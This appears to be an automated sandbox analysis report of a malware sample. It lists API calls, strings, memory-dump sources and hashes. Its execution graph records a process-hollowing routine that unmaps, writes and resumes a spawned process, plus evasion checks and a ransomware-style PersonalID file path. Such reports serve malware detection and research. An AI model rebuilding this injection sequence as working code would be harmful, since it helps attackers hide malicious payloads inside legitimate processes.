                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                                    • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                  • _memset.LIBCMT ref: 00413C83
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                  • String ID: vector<T> too long
                                                                                                  • API String ID: 1327501947-3788999226
                                                                                                  • Opcode ID: 1bfec74ce1320eefcdc9ae333d00d9e9fa03295fad3003f73d6f4c9085cf79ee
                                                                                                  • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                                  • Opcode Fuzzy Hash: 1bfec74ce1320eefcdc9ae333d00d9e9fa03295fad3003f73d6f4c9085cf79ee
                                                                                                  • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _fputws$CreateDirectory
                                                                                                  • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                  • API String ID: 2590308727-54166481
                                                                                                  • Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                                  • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                                                                                                  • Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                                  • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt
                                                                                                  • String ID: Assertion failed: %s, file %s, line %d
                                                                                                  • API String ID: 3494438863-969893948
                                                                                                  • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                  • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                                                                                                  • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                  • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 00480686
                                                                                                    • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                                  Strings
                                                                                                  • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                                  • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset_raise
                                                                                                  • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                  • API String ID: 1484197835-3867593797
                                                                                                  • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                  • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                                  • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                  • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F251
                                                                                                    • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F266
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                  • String ID: TeM
                                                                                                  • API String ID: 757275642-2215902641
                                                                                                  • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                  • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                                                                                  • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                  • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.2%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:38
                                                                                                  Total number of Limit Nodes:8
                                                                                                  execution_graph 32006 44a7026 32007 44a7035 32006->32007 32010 44a77c6 32007->32010 32011 44a77e1 32010->32011 32012 44a77ea CreateToolhelp32Snapshot 32011->32012 32013 44a7806 Module32First 32011->32013 32012->32011 32012->32013 32014 44a703e 32013->32014 32015 44a7815 32013->32015 32017 44a7485 32015->32017 32018 44a74b0 32017->32018 32019 44a74f9 32018->32019 32020 44a74c1 VirtualAlloc 32018->32020 32019->32019 32020->32019 32021 5de0000 32024 5de0630 32021->32024 32023 5de0005 32025 5de064c 32024->32025 32027 5de1577 32025->32027 32030 5de05b0 32027->32030 32033 5de05dc 32030->32033 32031 5de061e 32032 5de05e2 GetFileAttributesA 32032->32033 32033->32031 32033->32032 32035 5de0420 32033->32035 32036 5de04f3 32035->32036 32037 5de04ff CreateWindowExA 32036->32037 32038 5de04fa 32036->32038 32037->32038 32039 5de0540 PostMessageA 32037->32039 32038->32033 32040 5de055f 32039->32040 32040->32038 32042 5de0110 VirtualAlloc GetModuleFileNameA 32040->32042 32043 5de017d CreateProcessA 32042->32043 32044 5de0414 32042->32044 32043->32044 32046 5de025f VirtualFree VirtualAlloc Wow64GetThreadContext 32043->32046 32044->32040 32046->32044 32047 5de02a9 ReadProcessMemory 32046->32047 32048 5de02e5 VirtualAllocEx NtWriteVirtualMemory 32047->32048 32049 5de02d5 NtUnmapViewOfSection 32047->32049 32050 5de033b 32048->32050 32049->32048 32051 5de039d WriteProcessMemory Wow64SetThreadContext ResumeThread 32050->32051 32052 5de0350 NtWriteVirtualMemory 32050->32052 32053 5de03fb ExitProcess 32051->32053 32052->32050

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 05DE0156
                                                                                                  • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 05DE016C
                                                                                                  • CreateProcessA.KERNELBASE(?,00000000), ref: 05DE0255
                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 05DE0270
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 05DE0283
                                                                                                  • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 05DE029F
                                                                                                  • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 05DE02C8
                                                                                                  • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 05DE02E3
                                                                                                  • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 05DE0304
                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 05DE032A
                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 05DE0399
                                                                                                  • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 05DE03BF
                                                                                                  • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 05DE03E1
                                                                                                  • ResumeThread.KERNELBASE(00000000), ref: 05DE03ED
                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 05DE0412
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                  • String ID:
                                                                                                  • API String ID: 93872480-0
                                                                                                  • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                  • Instruction ID: 3c99eb84f86120d0ddbb557018f858e2931c5134906ed2288405bf6991fe53f6
                                                                                                  • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                  • Instruction Fuzzy Hash: B4B1C874A00208AFDB44CF98C895FAEBBB5FF88314F248158E549AB395D771AE41CF94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 15 5de0420-5de04f8 17 5de04ff-5de053c CreateWindowExA 15->17 18 5de04fa 15->18 20 5de053e 17->20 21 5de0540-5de0558 PostMessageA 17->21 19 5de05aa-5de05ad 18->19 20->19 22 5de055f-5de0563 21->22 22->19 23 5de0565-5de0579 22->23 23->19 25 5de057b-5de0582 23->25 26 5de05a8 25->26 27 5de0584-5de0588 25->27 26->22 27->26 28 5de058a-5de0591 27->28 28->26 29 5de0593-5de0597 call 5de0110 28->29 31 5de059c-5de05a5 29->31 31->26
                                                                                                  APIs
                                                                                                  • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 05DE0533
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                  • API String ID: 716092398-2341455598
                                                                                                  • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                  • Instruction ID: 1ce609e0e41bfe1c81493749e96be1060084855a3b50d4e3ffb1914e6189cbb6
                                                                                                  • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                  • Instruction Fuzzy Hash: 7D511670D08388DAEB11DBA8C849BADBFB2AF11708F144059D5446F2C6C3FA5659CB62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 32 5de05b0-5de05d5 33 5de05dc-5de05e0 32->33 34 5de061e-5de0621 33->34 35 5de05e2-5de05f5 GetFileAttributesA 33->35 36 5de05f7-5de05fe 35->36 37 5de0613-5de061c 35->37 36->37 38 5de0600-5de060b call 5de0420 36->38 37->33 40 5de0610 38->40 40->37
                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNELBASE(apfHQ), ref: 05DE05EC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID: apfHQ$o
                                                                                                  • API String ID: 3188754299-2999369273
                                                                                                  • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                  • Instruction ID: c9f7ed62a2051b937cea3a2eb9965a7b660bc0e3c873b3c1fa783b65a0c88571
                                                                                                  • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                  • Instruction Fuzzy Hash: 66011E70C0424CEBDB11EB98C5183AEBFB5AF41308F14809DC4492B241D7B69B59CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 044A77EE
                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 044A780E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012495232.00000000044A7000.00000040.00000020.00020000.00000000.sdmp, Offset: 044A7000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44a7000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                  • String ID:
                                                                                                  • API String ID: 3833638111-0
                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                  • Instruction ID: 9c900c7e7953c5b91cde868b8c40b9ff7245fc14cb55512f4a647b283dc5f4f3
                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                  • Instruction Fuzzy Hash: DFF062362007146BEB303FB5A88DA6BB6E8AF59725F10052EE642911C0DA74F8558661
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 044A74D6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012495232.00000000044A7000.00000040.00000020.00020000.00000000.sdmp, Offset: 044A7000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44a7000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                  • Instruction ID: 4f206f1b00ac3d2c4adf0072653cbceab878b63c0bf7016b0133c05588200153
                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                  • Instruction Fuzzy Hash: 95113C79A00208EFDB01DF98C985E99BBF5AF08351F058095F9489B362D371EA90DF80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 1442030790-0
                                                                                                  • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                  • Instruction ID: 2c9afba62720c09a83e795a5cb0fe5c198e1a1a58a7a74963dcc1fcedd2ac193
                                                                                                  • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                  • Instruction Fuzzy Hash: BD21D131204201AEEB257FA5EC09E5B7BE5FF41764B50B429F4C6590E1EA2285E0CA91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 05E03F51
                                                                                                    • Part of subcall function 05E05BA8: __getptd_noexit.LIBCMT ref: 05E05BA8
                                                                                                  • __gmtime64_s.LIBCMT ref: 05E03FEA
                                                                                                  • __gmtime64_s.LIBCMT ref: 05E04020
                                                                                                  • __gmtime64_s.LIBCMT ref: 05E0403D
                                                                                                  • __allrem.LIBCMT ref: 05E04093
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05E040AF
                                                                                                  • __allrem.LIBCMT ref: 05E040C6
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05E040E4
                                                                                                  • __allrem.LIBCMT ref: 05E040FB
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05E04119
                                                                                                  • __invoke_watson.LIBCMT ref: 05E0418A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 384356119-0
                                                                                                  • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction ID: c372855331b8ab95c6863110082e03b2b845246da20cf61dbba51b75361f4471
                                                                                                  • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction Fuzzy Hash: 7871F971B00716ABEB249E79CD45BAAB3B9BF04324F147539F994D72C0E770D9808790
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 3432600739-0
                                                                                                  • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                  • Instruction ID: 28515901f672e698395d769db16ab65f78d472ffffe58d1e62fa0d1b7aaed74b
                                                                                                  • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                  • Instruction Fuzzy Hash: 5B413432A04308AFEB00AFA4ED88B9E3BE5FF04314F107429E985961D1DB7596D5DB11
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ExitProcess___crt
                                                                                                  • String ID:
                                                                                                  • API String ID: 1022109855-0
                                                                                                  • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                  • Instruction ID: 758581b95a46b3ce6895d8c0cb87a876a75be6bb6a0d8a62e0114b1cb8e16811
                                                                                                  • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                  • Instruction Fuzzy Hash: 4F31B431A08250DFDB255F94FC8485977B4FB14324704B62AE9C56B2E0CBB459C9EF94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 05E2FC1F
                                                                                                    • Part of subcall function 05E1169C: std::exception::_Copy_str.LIBCMT ref: 05E116B5
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E2FC34
                                                                                                  • std::exception::exception.LIBCMT ref: 05E2FC4D
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E2FC62
                                                                                                  • std::regex_error::regex_error.LIBCPMT ref: 05E2FC74
                                                                                                    • Part of subcall function 05E2F914: std::exception::exception.LIBCMT ref: 05E2F92E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E2FC82
                                                                                                  • std::exception::exception.LIBCMT ref: 05E2FC9B
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E2FCB0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                                                                                  • String ID: leM
                                                                                                  • API String ID: 3569886845-2926266777
                                                                                                  • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                  • Instruction ID: 454c4714fede138269d25820db1d0d37397ca74f0921601a3e20edf733c97c6c
                                                                                                  • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                  • Instruction Fuzzy Hash: 9D11FE79D0020DBBCF04FFA5D459CDEBB7CAA04344F40C566AD6597244EB74A348CB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc_wprintf$_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 3721157643-0
                                                                                                  • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                  • Instruction ID: b642e6f8a6446d392e99a3d1fdb70132359ec6d30dac76b27221a7b3a505870a
                                                                                                  • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                  • Instruction Fuzzy Hash: 021127B66005506AC66273F45C19FFF3BEC9F45311F0410AAFACCE51C0DA185A4493B1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 65388428-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$_memset_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 217217746-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$_memset_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 217217746-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3534693527-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __getptd_noexit.LIBCMT ref: 05EA66DD
                                                                                                    • Part of subcall function 05E059BF: __calloc_crt.LIBCMT ref: 05E059E2
                                                                                                    • Part of subcall function 05E059BF: __initptd.LIBCMT ref: 05E05A04
                                                                                                  • __calloc_crt.LIBCMT ref: 05EA6700
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 05EA671E
                                                                                                  • __invoke_watson.LIBCMT ref: 05EA673B
